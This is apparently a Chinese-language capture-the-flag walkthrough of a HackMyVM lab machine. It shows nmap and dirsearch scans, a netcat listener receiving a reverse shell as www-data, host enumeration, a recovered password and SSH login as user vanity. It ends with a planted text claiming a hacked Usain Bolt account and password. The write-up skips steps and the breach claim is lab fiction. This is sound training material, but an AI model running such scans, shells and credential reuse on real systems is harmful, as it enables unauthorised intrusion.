nmap -sP 192.168.56.0/24 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-28 03:20 EST Nmap scan report for192.168.56.1 Host is up (0.00045s latency). MAC Address: 0A:00:27:00:00:09 (Unknown) Nmap scan report for192.168.56.2 Host is up (0.00046s latency). MAC Address: 08:00:27:AC:8D:22 (Oracle VirtualBox virtual NIC) Nmap scan report for192.168.56.13 Host is up (0.00055s latency). MAC Address: 08:00:27:10:57:22 (Oracle VirtualBox virtual NIC
1 2 3 4 5 6 7 8 9 10
nmap -sT -min-rate 10000 -p- 192.168.56.13 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-28 03:21 EST Nmap scan report for192.168.56.13 Host is up (0.0013s latency). Not shown: 65533 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:10:57:22 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in18.75 seconds
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
nmap -sT -sV -O -p- 192.168.56.13 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-28 03:21 EST Nmap scan report for192.168.56.13 Host is up (0.00062s latency). Not shown: 65533 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0) 80/tcp open http Apache httpd 2.4.61 ((Debian)) MAC Address: 08:00:27:10:57:22 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in25.37 seconds
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
nmap -script=vuln -p- 192.168.56.13 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-28 03:22 EST Nmap scan report for192.168.56.13 Host is up (0.00067s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http | http-fileupload-exploiter: | |_ Couldn't find a file-type field. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug) |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-csrf: Couldn't find any CSRF vulnerabilities. | http-enum: |_ /img/: Potentially interesting directory w/ listing on 'apache/2.4.61 (debian)' MAC Address: 08:00:27:10:57:22 (Oracle VirtualBox virtual NIC)
枚举出可能有兴趣的目录img
访问主页,是关于巴黎奥运会的信息
渗透
img目录
查看一下之前nmap扫出来可能有趣的目录,仅此而已
再扫描一次目录,依旧如此
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
dirsearch -u http://192.168.56.13 -x 403 -e php,zip,txt /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict
┌──(root㉿kali)-[~] └─# nc -lvp 1234 listening on [any] 1234 ... 192.168.56.13: inverse host lookup failed: Host name lookup failure connect to [192.168.56.4] from (UNKNOWN) [192.168.56.13] 37692 bash: cannot set terminal process group (643): Inappropriate ioctl for device bash: no job control in this shell www-data@jo2024:/$
靶机信息收集
1 2
www-data@jo2024:/home/vanity$ uname -a Linux jo2024.hmv 6.1.0-23-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.99-1 (2024-07-15) x86_64 GNU/Linux
1 2 3 4 5 6 7 8 9 10 11
www-data@jo2024:/home/vanity$ ip add 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host noprefixroute valid_lft forever preferred_lft forever 2: enp0s3: <BROADCAST,MULTICAST,DYNAMIC,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000 link/ether 08:00:27:10:57:22 brd ff:ff:ff:ff:ff:ff inet 192.168.56.13/24 brd 192.168.56.255 scope global dynamic enp0s3 valid_lft 521sec preferred_lft 521sec
没想到还能这样玩 what can i say ,看样子是得到了vanity账户的账号密码(xd0oITR93KIQDbiD)
登录SSH
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
┌──(root㉿kali)-[~/Desktop/test/jo2024] └─# ssh vanity@192.168.56.13 The authenticity of host '192.168.56.13 (192.168.56.13)' can't be established. ED25519 key fingerprint is SHA256:La9YyHs4GERVO8XTRRw0cLh6XcInXX35Ar9OiMsXwQk. This host key is known by the following other names/addresses: ~/.ssh/known_hosts:6: [hashed name] Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.56.13' (ED25519) to the list of known hosts. vanity@192.168.56.13's password: Linux jo2024.hmv 6.1.0-23-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.99-1 (2024-07-15) x86_64
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. vanity@jo2024:~$
As part of a recent cyber attack, we managed to access Usain Bolt's personal account. The password associated with his account is <strong>LightningBolt123</strong>. This breach demonstrates the vulnerabilities of even the most secure systems.